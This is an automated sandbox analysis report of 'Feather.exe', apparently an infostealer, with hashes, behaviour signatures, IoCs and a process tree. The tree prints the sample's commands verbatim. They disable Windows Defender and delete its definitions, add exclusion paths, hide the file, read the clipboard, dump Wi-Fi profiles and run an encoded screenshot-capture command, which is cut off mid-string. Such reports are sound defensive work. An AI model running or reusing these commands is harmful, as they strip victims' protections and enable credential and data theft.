Analysis
-
max time kernel
15s -
max time network
26s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24/11/2024, 17:52
Behavioral task
behavioral1
Sample
Feather.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Feather.exe
-
Size
7.4MB
-
MD5
05b012c29c08555e882492661631ab8d
-
SHA1
1fdba9382eaa48cf83561c417045b78641b8a06f
-
SHA256
40f93cddb418fe7c24ae168626d4401598863c917710bb178e6419ee54aa11f3
-
SHA512
d9c3c0a1fa43ca8820ab81f9fac276d8c450b4c534b12ca39f8a1d5a7e82b1e6680afeb6300be61610bad4cf032c68ced82ddb3f183ca1f1b156302a443558e7
-
SSDEEP
196608:p/YAYIOshoKMuIkhVastRL5Di3ueHt4fX:tYATOshouIkPftRL54dG/
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 936 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2240 powershell.exe 1080 powershell.exe 2668 powershell.exe 5800 powershell.exe 32 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5020 cmd.exe 388 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5140 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe 5084 Feather.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 33 discord.com 35 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3132 tasklist.exe 3704 tasklist.exe 2996 tasklist.exe 1976 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4628 cmd.exe -
resource yara_rule behavioral1/files/0x002800000004508c-21.dat upx behavioral1/memory/5084-25-0x00007FF9E9C20000-0x00007FF9EA209000-memory.dmp upx behavioral1/memory/5084-32-0x00007FF9F32B0000-0x00007FF9F32BF000-memory.dmp upx behavioral1/files/0x002800000004508a-31.dat upx behavioral1/memory/5084-30-0x00007FF9EB8D0000-0x00007FF9EB8F3000-memory.dmp upx behavioral1/files/0x002800000004507e-28.dat upx behavioral1/files/0x0028000000045085-48.dat upx behavioral1/files/0x0028000000045084-47.dat upx behavioral1/files/0x0028000000045083-46.dat upx behavioral1/files/0x0028000000045082-45.dat upx behavioral1/files/0x0028000000045081-44.dat upx behavioral1/files/0x0028000000045080-43.dat upx behavioral1/files/0x002800000004507f-42.dat upx behavioral1/files/0x002800000004507d-41.dat upx behavioral1/files/0x0028000000045091-40.dat upx behavioral1/files/0x0028000000045090-39.dat upx behavioral1/files/0x002800000004508f-38.dat upx behavioral1/files/0x002800000004508b-35.dat upx behavioral1/files/0x0028000000045089-34.dat upx behavioral1/memory/5084-54-0x00007FF9EAB70000-0x00007FF9EAB9D000-memory.dmp upx behavioral1/memory/5084-56-0x00007FF9E0F40000-0x00007FF9E0F59000-memory.dmp upx behavioral1/memory/5084-58-0x00007FF9E0F10000-0x00007FF9E0F33000-memory.dmp upx behavioral1/memory/5084-60-0x00007FF9DAFF0000-0x00007FF9DB167000-memory.dmp upx behavioral1/memory/5084-62-0x00007FF9DBE10000-0x00007FF9DBE29000-memory.dmp upx behavioral1/memory/5084-66-0x00007FF9DAFB0000-0x00007FF9DAFE3000-memory.dmp upx behavioral1/memory/5084-64-0x00007FF9EB780000-0x00007FF9EB78D000-memory.dmp upx behavioral1/memory/5084-70-0x00007FF9E9C20000-0x00007FF9EA209000-memory.dmp upx behavioral1/memory/5084-74-0x00007FF9EB8D0000-0x00007FF9EB8F3000-memory.dmp upx behavioral1/memory/5084-73-0x00007FF9DA950000-0x00007FF9DAE70000-memory.dmp upx behavioral1/memory/5084-71-0x00007FF9DAE70000-0x00007FF9DAF3D000-memory.dmp upx behavioral1/memory/5084-76-0x00007FF9F1CF0000-0x00007FF9F1D04000-memory.dmp upx behavioral1/memory/5084-78-0x00007FF9EAEA0000-0x00007FF9EAEAD000-memory.dmp upx behavioral1/memory/5084-81-0x00007FF9DB910000-0x00007FF9DBA2C000-memory.dmp upx behavioral1/memory/5084-80-0x00007FF9E0F10000-0x00007FF9E0F33000-memory.dmp upx behavioral1/memory/5084-102-0x00007FF9DAFF0000-0x00007FF9DB167000-memory.dmp upx behavioral1/memory/5084-109-0x00007FF9DBE10000-0x00007FF9DBE29000-memory.dmp upx behavioral1/memory/5084-216-0x00007FF9DAFB0000-0x00007FF9DAFE3000-memory.dmp upx behavioral1/memory/5084-271-0x00007FF9DAE70000-0x00007FF9DAF3D000-memory.dmp upx behavioral1/memory/5084-275-0x00007FF9DA950000-0x00007FF9DAE70000-memory.dmp upx behavioral1/memory/5084-292-0x00007FF9EB8D0000-0x00007FF9EB8F3000-memory.dmp upx behavioral1/memory/5084-291-0x00007FF9E9C20000-0x00007FF9EA209000-memory.dmp upx behavioral1/memory/5084-297-0x00007FF9DAFF0000-0x00007FF9DB167000-memory.dmp upx behavioral1/memory/5084-341-0x00007FF9E9C20000-0x00007FF9EA209000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5800 cmd.exe 5612 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5512 WMIC.exe 6004 WMIC.exe 5588 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5208 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 60 IoCs
pid Process 4636 WMIC.exe 4636 WMIC.exe 4636 WMIC.exe 4636 WMIC.exe 32 powershell.exe 2240 powershell.exe 2240 powershell.exe 32 powershell.exe 5588 WMIC.exe 5588 WMIC.exe 5588 WMIC.exe 5588 WMIC.exe 5512 WMIC.exe 5512 WMIC.exe 5512 WMIC.exe 5512 WMIC.exe 1080 powershell.exe 1080 powershell.exe 2112 WMIC.exe 2112 WMIC.exe 2112 WMIC.exe 2112 WMIC.exe 1588 powershell.exe 388 powershell.exe 1588 powershell.exe 388 powershell.exe 1588 powershell.exe 388 powershell.exe 2668 powershell.exe 2668 powershell.exe 5532 powershell.exe 5532 powershell.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 100 WMIC.exe 100 WMIC.exe 100 WMIC.exe 100 WMIC.exe 4020 WMIC.exe 4020 WMIC.exe 4020 WMIC.exe 4020 WMIC.exe 1320 WMIC.exe 1320 WMIC.exe 1320 WMIC.exe 1320 WMIC.exe 5800 powershell.exe 2696 taskmgr.exe 2696 taskmgr.exe 5800 powershell.exe 6004 WMIC.exe 6004 WMIC.exe 6004 WMIC.exe 6004 WMIC.exe 5464 powershell.exe 5464 powershell.exe 5464 powershell.exe 2696 taskmgr.exe 2696 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4636 WMIC.exe Token: SeSecurityPrivilege 4636 WMIC.exe Token: SeTakeOwnershipPrivilege 4636 WMIC.exe Token: SeLoadDriverPrivilege 4636 WMIC.exe Token: SeSystemProfilePrivilege 4636 WMIC.exe Token: SeSystemtimePrivilege 4636 WMIC.exe Token: SeProfSingleProcessPrivilege 4636 WMIC.exe Token: SeIncBasePriorityPrivilege 4636 WMIC.exe Token: SeCreatePagefilePrivilege 4636 WMIC.exe Token: SeBackupPrivilege 4636 WMIC.exe Token: SeRestorePrivilege 4636 WMIC.exe Token: SeShutdownPrivilege 4636 WMIC.exe Token: SeDebugPrivilege 4636 WMIC.exe Token: SeSystemEnvironmentPrivilege 4636 WMIC.exe Token: SeRemoteShutdownPrivilege 4636 WMIC.exe Token: SeUndockPrivilege 4636 WMIC.exe Token: SeManageVolumePrivilege 4636 WMIC.exe Token: 33 4636 WMIC.exe Token: 34 4636 WMIC.exe Token: 35 4636 WMIC.exe Token: 36 4636 WMIC.exe Token: SeDebugPrivilege 1976 tasklist.exe Token: SeIncreaseQuotaPrivilege 4636 WMIC.exe Token: SeSecurityPrivilege 4636 WMIC.exe Token: SeTakeOwnershipPrivilege 4636 WMIC.exe Token: SeLoadDriverPrivilege 4636 WMIC.exe Token: SeSystemProfilePrivilege 4636 WMIC.exe Token: SeSystemtimePrivilege 4636 WMIC.exe Token: SeProfSingleProcessPrivilege 4636 WMIC.exe Token: SeIncBasePriorityPrivilege 4636 WMIC.exe Token: SeCreatePagefilePrivilege 4636 WMIC.exe Token: SeBackupPrivilege 4636 WMIC.exe Token: SeRestorePrivilege 4636 WMIC.exe Token: SeShutdownPrivilege 4636 WMIC.exe Token: SeDebugPrivilege 4636 WMIC.exe Token: SeSystemEnvironmentPrivilege 4636 WMIC.exe Token: SeRemoteShutdownPrivilege 4636 WMIC.exe Token: SeUndockPrivilege 4636 WMIC.exe Token: SeManageVolumePrivilege 4636 WMIC.exe Token: 33 4636 WMIC.exe Token: 34 4636 WMIC.exe Token: 35 4636 WMIC.exe Token: 36 4636 WMIC.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeIncreaseQuotaPrivilege 2240 powershell.exe Token: SeSecurityPrivilege 2240 powershell.exe Token: SeTakeOwnershipPrivilege 2240 powershell.exe Token: SeLoadDriverPrivilege 2240 powershell.exe Token: SeSystemProfilePrivilege 2240 powershell.exe Token: SeSystemtimePrivilege 2240 powershell.exe Token: SeProfSingleProcessPrivilege 2240 powershell.exe Token: SeIncBasePriorityPrivilege 2240 powershell.exe Token: SeCreatePagefilePrivilege 2240 powershell.exe Token: SeBackupPrivilege 2240 powershell.exe Token: SeRestorePrivilege 2240 powershell.exe Token: SeShutdownPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeSystemEnvironmentPrivilege 2240 powershell.exe Token: SeRemoteShutdownPrivilege 2240 powershell.exe Token: SeUndockPrivilege 2240 powershell.exe Token: SeManageVolumePrivilege 2240 powershell.exe Token: 33 2240 powershell.exe Token: 34 2240 powershell.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe 2696 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5780 wrote to memory of 5084 5780 Feather.exe 83 PID 5780 wrote to memory of 5084 5780 Feather.exe 83 PID 5084 wrote to memory of 456 5084 Feather.exe 84 PID 5084 wrote to memory of 456 5084 Feather.exe 84 PID 5084 wrote to memory of 3756 5084 Feather.exe 85 PID 5084 wrote to memory of 3756 5084 Feather.exe 85 PID 5084 wrote to memory of 1964 5084 Feather.exe 86 PID 5084 wrote to memory of 1964 5084 Feather.exe 86 PID 5084 wrote to memory of 4760 5084 Feather.exe 88 PID 5084 wrote to memory of 4760 5084 Feather.exe 88 PID 5084 wrote to memory of 4272 5084 Feather.exe 92 PID 5084 wrote to memory of 4272 5084 Feather.exe 92 PID 1964 wrote to memory of 1076 1964 cmd.exe 94 PID 1964 wrote to memory of 1076 1964 cmd.exe 94 PID 4760 wrote to memory of 1976 4760 cmd.exe 95 PID 4760 wrote to memory of 1976 4760 cmd.exe 95 PID 4272 wrote to memory of 4636 4272 cmd.exe 96 PID 4272 wrote to memory of 4636 4272 cmd.exe 96 PID 3756 wrote to memory of 32 3756 cmd.exe 97 PID 3756 wrote to memory of 32 3756 cmd.exe 97 PID 456 wrote to memory of 2240 456 cmd.exe 98 PID 456 wrote to memory of 2240 456 cmd.exe 98 PID 5084 wrote to memory of 6040 5084 Feather.exe 101 PID 5084 wrote to memory of 6040 5084 Feather.exe 101 PID 6040 wrote to memory of 5556 6040 cmd.exe 103 PID 6040 wrote to memory of 5556 6040 cmd.exe 103 PID 5084 wrote to memory of 6068 5084 Feather.exe 104 PID 5084 wrote to memory of 6068 5084 Feather.exe 104 PID 6068 wrote to memory of 4432 6068 cmd.exe 106 PID 6068 wrote to memory of 4432 6068 cmd.exe 106 PID 5084 wrote to memory of 2844 5084 Feather.exe 107 PID 5084 wrote to memory of 2844 5084 Feather.exe 107 PID 2844 wrote to memory of 5588 2844 cmd.exe 109 PID 2844 wrote to memory of 5588 2844 cmd.exe 109 PID 5084 wrote to memory of 3628 5084 Feather.exe 110 PID 5084 wrote to memory of 3628 5084 Feather.exe 110 PID 3628 wrote to memory of 5512 3628 cmd.exe 112 PID 3628 wrote to memory of 5512 3628 cmd.exe 112 PID 3756 wrote to memory of 936 3756 cmd.exe 113 PID 3756 wrote to memory of 936 3756 cmd.exe 113 PID 5084 wrote to memory of 4628 5084 Feather.exe 114 PID 5084 wrote to memory of 4628 5084 Feather.exe 114 PID 5084 wrote to memory of 1440 5084 Feather.exe 116 PID 5084 wrote to memory of 1440 5084 Feather.exe 116 PID 4628 wrote to memory of 5504 4628 cmd.exe 118 PID 4628 wrote to memory of 5504 4628 cmd.exe 118 PID 1440 wrote to memory of 1080 1440 cmd.exe 119 PID 1440 wrote to memory of 1080 1440 cmd.exe 119 PID 5084 wrote to memory of 4376 5084 Feather.exe 122 PID 5084 wrote to memory of 4376 5084 Feather.exe 122 PID 5084 wrote to memory of 5468 5084 Feather.exe 123 PID 5084 wrote to memory of 5468 5084 Feather.exe 123 PID 4376 wrote to memory of 3132 4376 cmd.exe 126 PID 4376 wrote to memory of 3132 4376 cmd.exe 126 PID 5468 wrote to memory of 3704 5468 cmd.exe 127 PID 5468 wrote to memory of 3704 5468 cmd.exe 127 PID 5084 wrote to memory of 552 5084 Feather.exe 128 PID 5084 wrote to memory of 552 5084 Feather.exe 128 PID 5084 wrote to memory of 5020 5084 Feather.exe 130 PID 5084 wrote to memory of 5020 5084 Feather.exe 130 PID 5084 wrote to memory of 6024 5084 Feather.exe 131 PID 5084 wrote to memory of 6024 5084 Feather.exe 131 PID 5084 wrote to memory of 2696 5084 Feather.exe 181 PID 5084 wrote to memory of 2696 5084 Feather.exe 181 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5504 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Feather.exe"C:\Users\Admin\AppData\Local\Temp\Feather.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\Feather.exe"C:\Users\Admin\AppData\Local\Temp\Feather.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Feather.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Feather.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:32
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ERROR 501: Your HWID has not been whitelisted.', 0, 'HWID ERROR', 32+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ERROR 501: Your HWID has not been whitelisted.', 0, 'HWID ERROR', 32+16);close()"4⤵PID:1076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:6040 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:6068 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Feather.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Feather.exe"4⤵
- Views/modifies file attributes
PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5468 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:552
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:6024
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2696
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5800 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3752
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAA